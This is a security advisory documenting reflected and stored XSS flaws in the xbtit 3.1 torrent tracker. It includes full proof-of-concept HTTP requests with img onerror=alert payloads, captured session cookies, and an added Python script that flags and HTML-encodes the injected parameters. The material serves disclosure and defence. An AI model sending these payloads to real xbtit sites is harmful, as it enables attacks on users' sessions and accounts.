Reflected XSS
The page /index.php?page=torrent-details is actually /details.php, included by index.php through the page parameter. The id parameter (GET) is vulnerable to reflected XSS.
The PoC uses the following XSS payload:
<img src=a onerror=alert(6*8)>
GET /xbtit/xbtit-3.1-master/index.php?page=torrent-details&id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&rating=5&vote=Vote! HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345
Upgrade-Insecure-Requests: 1
Stored XSS
The /ajaxchat/sendChatData.php page is vulnerable to stored XSS through the n parameter (POST).
This is the original, legitimate POST request that sends a message to the chat box:
POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user&c=hello&u=6
This is the modified POST request that sends the same chat message, with the following PoC XSS payload appended, URL-encoded, to the n parameter (POST), which carries the username of the user posting the message:
<img src=a onerror=alert("XSS")>
POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%22%58%53%53%22%29%3e&c=hello&u=6
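The following Python script is an added example for both the reflected (id, GET) and stored (n, POST) cases above; it is not part of the advisory or of the xbtit code base. It takes the request line and form body from the two captures on this page (copied here as constructed constants), decodes the parameters the same way PHP populates $_GET and $_POST, flags any value that contains tag or event-handler markup, and shows the output encoding that would neutralise it. html.escape(value, quote=True) is used as a stand-in for PHP's htmlspecialchars($v, ENT_QUOTES); the regular expression and function names are the example's own.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the two requests in the advisory: only the request line and,
# for the POST, the form body are needed by the checks below.
REFLECTED_REQUEST_LINE = (
    "GET /xbtit/xbtit-3.1-master/index.php?page=torrent-details"
    "&id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr"
    "%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&rating=5&vote=Vote! HTTP/1.1"
)
STORED_REQUEST_LINE = "POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1"
STORED_BODY = (
    "n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d"
    "%61%6c%65%72%74%28%22%58%53%53%22%29%3e&c=hello&u=6"
)

# Indicators that a decoded parameter value carries HTML rather than plain data:
# an opening tag, or an inline event-handler attribute such as onerror=.
HTML_INJECTION = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_params(request_line, body=""):
    """Return {name: [decoded values]} for query-string and form-body parameters.

    parse_qs percent-decodes the values, so %3c%69%6d%67 becomes '<img', which is
    exactly what the PHP application sees in $_GET / $_POST.
    """
    method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body:
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return params


def flag_html_injection(params):
    """Names of parameters whose decoded value contains tag or handler markup."""
    return sorted(
        name
        for name, values in params.items()
        if any(HTML_INJECTION.search(v) for v in values)
    )


def safe_render(value):
    """Encode a value for insertion into HTML text or a quoted attribute.

    html.escape with quote=True mirrors PHP's htmlspecialchars($v, ENT_QUOTES):
    < > & " ' are replaced, so the browser shows the payload as text instead of
    creating an <img> element and running its onerror handler.
    """
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for label, line, body in (
        ("reflected GET", REFLECTED_REQUEST_LINE, ""),
        ("stored POST", STORED_REQUEST_LINE, STORED_BODY),
    ):
        params = decode_params(line, body)
        flagged = flag_html_injection(params)
        print(f"{label}: suspicious parameters = {flagged}")
        for name in flagged:
            print(f"  decoded: {params[name][0]!r}")
            print(f"  encoded: {safe_render(params[name][0])!r}")
```

Running it reports id for the GET and n for the POST, and prints each value both as the application receives it and as it should be written into the page. In details.php and the chat renderer the same encoding step, applied at the point where id or the username is written into the HTML, is what removes both vulnerabilities; in the stored case encoding on output also covers messages that are already in the database.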
[Vulnerability Type]
XSS stored & reflected
——————————————
[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1
——————————————
[Attack Type]
Remote – Authenticated
——————————————
[Reference]
https://github.com/btiteam/xbtit-3.1/